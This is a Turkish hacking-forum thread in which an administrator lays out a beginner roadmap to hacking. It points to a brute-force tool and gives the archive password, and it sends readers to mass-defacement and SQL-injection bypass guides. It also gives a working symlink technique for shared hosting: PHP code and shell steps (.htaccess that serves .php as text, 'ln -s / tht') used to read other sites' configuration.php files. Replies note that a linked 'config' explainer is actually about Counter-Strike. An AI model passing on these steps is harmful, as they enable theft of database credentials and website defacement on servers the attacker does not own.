Bana Hacklemeyi Öğret Demeden Önce Bakınız.

Znéa

Administrator
19 Tem 2011
4,384
61
Bellagio
Bana Hacklemeyi Öğret Demeden Önce Bakınız.[GÜNCEL]

thtson2.png

BU KONU HAKKINDA BALAMİR97 ARKADAŞIM İLE BAYA KONUŞTUK VE BÖYLE BİR KONU AÇMAYI GEREKLİ GÖRDÜK.YENİ ÜYE OLAN ARKADAŞLARIMIZIN BANA HACKERLIĞI ÖĞRET DEMEDEN ÖNCE BU KONUYU GÖZ GEZDİRMESİNİ HALA ANLAMADILARSA BİZE O ZAMAN SORMASINI RİCA EDİYOR VE BAŞLIYORUM .
1.ADIM.
ŞİMDİ BALAMİRDEN ÖĞRENDİĞİM İLK ŞEY AZİMDİ SİZİNDE İLK YAPMANIZ GEREKEN ŞEY ODUR 1. KEREDE ANLAMADINIZ MI BİR DAHA OKUYUN 2. KERE OKUYUN 3. KERE OKUYUN YETERKİ VAZGEÇMEYİN 1. KEZ BAŞARISIZ MI OLDUNUZ YİNE DENEYİN YİNE VE YİNE YILMAMAK BU İŞİN TEMEL SIRRIDIR BUNU BİLİN İSTEDİM
2.ADIM
BRUTE FORCE KURULUMU
TURKHACKTEAM AİLESİNDEN Star-Turk'UN YAPTIĞI Özel Brute Force Programı ( THT Özel )
KONUYA BURADAN ULAŞA BİLİRSİNİZ
PROGRAMINI İNDİRMEKLE BAŞLIYORUZ
İNDİRME LİNKİNE BURADAN ULAŞA BİLİRSİNİZ
RAR ŞİFREMİZ : Star-Turk
İNDİRMEDE VEYA KURMADA SORUN YAŞAYAN ÖZELDEN VEYA ZİYARETÇİ MESAJINDAN BANA ULAŞSIN EN GEÇ 24 SAAT İÇİNDE GERİ DÖNECEĞİM.
3.ADIM
MASS DEFACE VE CONFİG NEDİR BUNLARI BİLMEMİZ GEREK ARKADAŞLAR
CONFİG NEDİR NE VE İŞE YARAR ?
SeSa1453 ARKADARŞIMIZIN HAZIRLADIĞI BU KONUDA CONFİG'İ DAHA İYİ ANLAYA BİLİRİZ.
LİNK
MASS DEFACE NEDİR ?
ONUDA YİNE THT AİLESİNDEN By H4cker ARKADAŞIMIZIN THT İÇİN HAZIRLADIĞI VİDEODA ANLAYA BİLİRİZ.ANLAMADIĞINIZ YER VARSA YİNE SORABİLİRSİNİZ 24 SAAT İÇİNDE DÖNÜŞ YAPACAĞIZ
LİNK
4.ADIM
ALcatraz' ARKADAŞIMIZIN AÇTIĞI
SQL injection Bypass Anlatımlarım.
BU KONUYU OKUYORUZ.KENDİSİNİN BAŞARILARININ DEVAMINI DİLİYORUZ VE KONUMUZA GERİ DÖNÜYORUZ ANLAMADIĞINIZ BİR YER VARSA ELİMİNDEN GELDİĞİ KADAR DİĞER TÜM ÜYELERİNİNDE YARDIM EDECEĞİNİ UMUYORUM 1. KURALDA DEDİĞİM GİBİ ANLAYANA KADAR OKUYUN.
5.ADIM BYPASS YİNE AZ ÖNCE VERDİĞİM ALcatraz' ARKADAŞIMIN AÇTIĞI KONUDA BYPASS OKUMALIYIZ VE ANLAMALIYIZ
LİNK
SIRA GELDİ 6.ADIM
OLURYA LAZIM OLUR OLMAZSA BİLE BİLGİ BİLGİDİR
Symlink Nedir
+ Linux İşletim Sistemlerinde Tüm Dosyalar Hiyerarşik Bir Düzende Kloserlerin İçinde Bulunur.Bir Klosor İçindeki Dosyayi Başka Bir Dosyaya Aktarmaya Çaliştigimizda Hata Verirse Bu Durumda "Symlink" Devreye Giriyor. "Symlink" Adındanda Anliyacaginiz Gibi Sahte Bir Bag Oluşturma Görevi Vardır. Bu Yöntem Üzerinde Çaliştigimiz Dosya Bir Dizinde Olucak Ve Biz İstedigimizde Erişebilecegiz
“ln –s /root/tht/klasor/dosya.txt /var/www/tht.txt”
Bu Komut İle " /root/tht/klasor/ " Dizininde Bulunan "dosya.txt "Dosyasını " /var/www/ " Dizininde " tht.txt " Dosyasi Symlink'lendi...

Symlink PHP Olarak Gösterirsek ;
Kod:
<?php

$dosya = ‘../../home/asia/configuration.php’;

$yeniYol = ‘../../home/erica/sym/1.txt’;

symlink($dosya, $yeniYol);

echo readlink($yeniYol);

?>
Bu Php Kodu İle "/home/asia/" Dizininde Bulunan "configuration.php" Dosyasini Okuyarak "/home/erica/sym/" Dizininde 1.txt Olarak Symlink'ledik. Normal Şartlarda Erişemedigimiz "configuration.php" Dosyasını Symlink Üzerinden Erişimini Sagladik..

Manual Symlink Çekimi

Aşagidaki Komutları Sirasiyla Girelim...
Kod:
mkdir tht
Kod:
cd tht
Bir ".htacccess" Oluşturalim.
Kod:
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
Son Olarak
Kod:
ln -s / tht
BU KADAR ARKADAŞLAR BU KONUYU AÇMAMDA YARDIMCI OLAN
Başta Balamir97 Ve Yararlı Bilgilerle Bize Bu Konuda Yardımcı Olduğu İçin ALcatraz' &Star-Türk& SeSa1453 TEŞEKKÜR EDİYORUM.Bi Nebze Yardımcı Olabildiysem Ne Mutlu Bana​

Son düzenleme:

AlbaYm

Katılımcı Üye
4 Kas 2012
439
0
İstanbul
Hiç okumadan alıntı yapmışsın, config bölümüne bak ;) "
%100 aim %100 Hs gibi saçmalıklara sakın inanmayın..​

Config sadece oyunun akışını değiştirir..Cl , gl , mouse ayarlarına en iyi değerler verilip oyunu daha akıcı oynamanızı sağlar.. Zaten diğer konulardada paylaştım !​

Cfg kelimesi Config (Config: Ayar, Configuration: Ayarlama) kelimesinin kısaltılmışıdır ve bu türdeki dosyaların uzantısıdır.​

Bu dosyanın amacı; ayarları saklamak ve başka bilgisayara geçtiğinizde ya da daha sonra gerektiğinde bu dosya ile bu kaydedilmiş ayarları kullanmaktır. Mac.cfg Public.cfg Nick.cfg gibi...​

Tabi her konuda olduğu gibi bu dosyayı da amacı dışında kullar var. Hile programın cfg dosyasındaki kodları Counter-Strike cfg dosyasına ekliyen mi ararsınız (İşe yaramaz kasmayın). Bütün cfgleri bir dosyaya yığan mı ararsın. Daha nick değiştirmeyi bilmeyenlerin cfg ile super oyuncu olacaklarını sanmalarını mı ararsın.​

Size bir uyarı 30Kb den daha büyük bir cfg tamamiyle saçmalanmış kod yığınıdır. Cfg size oyunda zaten ayarlanabilen değerleri değiştirmenize yardımcı olur. Cfg size herkezi headshot vurma özelliği kazandırmaz. Bunu arka planda çalışan Trojanlı özel olarak hazırlanmış hile programları yapabilir.​

Elinizdeki config dosyalarını kullanmak için cfg dosyasınızı cstrike klasörüne taşıyın oyunu açıp, konsola exec dosyaisim.cfg yazın ve enterlayın. Bu dosya içerisinde oyun ile ilgili çalıştırılabilir komutlar ve kullanılabilir ayarlar okunup işleme koyulacaktır. Diğer kodlar geçersiz olduğu için bilgisayarınızı yavaşlatmaktan başka işe yaramıyacaktır." CounterStrike değilmi bu?

Znéa

Administrator
19 Tem 2011
4,384
61
Bellagio
11:15
o bölümü aldım teşekkürler uyarın için yanlış bilgi olmuş 24 saat içinde hazırlayıp tekrar yazıcağım

19:18
KONU DÜZELTİLMİŞTİR.İYİ FORUMLAR DEDİĞİM GİBİ BİR SORUN OLDUĞU TAKTİRDE BENİMLE İLETİŞİM HALİNE GEÇİNİZ 24 SAAT İÇİNDE GERİ DÖNECEĞİM.İYİ FORUMLAR :)

Son düzenleme:

vezirsiz

Katılımcı Üye
24 Şub 2014
697
0
PendikBireyD
:-/

Hiç okumadan alıntı yapmışsın, config bölümüne bak ;) "
%100 aim %100 Hs gibi saçmalıklara sakın inanmayın..​

Config sadece oyunun akışını değiştirir..Cl , gl , mouse ayarlarına en iyi değerler verilip oyunu daha akıcı oynamanızı sağlar.. Zaten diğer konulardada paylaştım !​

Cfg kelimesi Config (Config: Ayar, Configuration: Ayarlama) kelimesinin kısaltılmışıdır ve bu türdeki dosyaların uzantısıdır.​

Bu dosyanın amacı; ayarları saklamak ve başka bilgisayara geçtiğinizde ya da daha sonra gerektiğinde bu dosya ile bu kaydedilmiş ayarları kullanmaktır. Mac.cfg Public.cfg Nick.cfg gibi...​

Tabi her konuda olduğu gibi bu dosyayı da amacı dışında kullar var. Hile programın cfg dosyasındaki kodları Counter-Strike cfg dosyasına ekliyen mi ararsınız (İşe yaramaz kasmayın). Bütün cfgleri bir dosyaya yığan mı ararsın. Daha nick değiştirmeyi bilmeyenlerin cfg ile super oyuncu olacaklarını sanmalarını mı ararsın.​

Size bir uyarı 30Kb den daha büyük bir cfg tamamiyle saçmalanmış kod yığınıdır. Cfg size oyunda zaten ayarlanabilen değerleri değiştirmenize yardımcı olur. Cfg size herkezi headshot vurma özelliği kazandırmaz. Bunu arka planda çalışan Trojanlı özel olarak hazırlanmış hile programları yapabilir.​

Elinizdeki config dosyalarını kullanmak için cfg dosyasınızı cstrike klasörüne taşıyın oyunu açıp, konsola exec dosyaisim.cfg yazın ve enterlayın. Bu dosya içerisinde oyun ile ilgili çalıştırılabilir komutlar ve kullanılabilir ayarlar okunup işleme koyulacaktır. Diğer kodlar geçersiz olduğu için bilgisayarınızı yavaşlatmaktan başka işe yaramıyacaktır." CounterStrike değilmi bu?

Hiç okumadan Cevap veriyorsun :-/

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.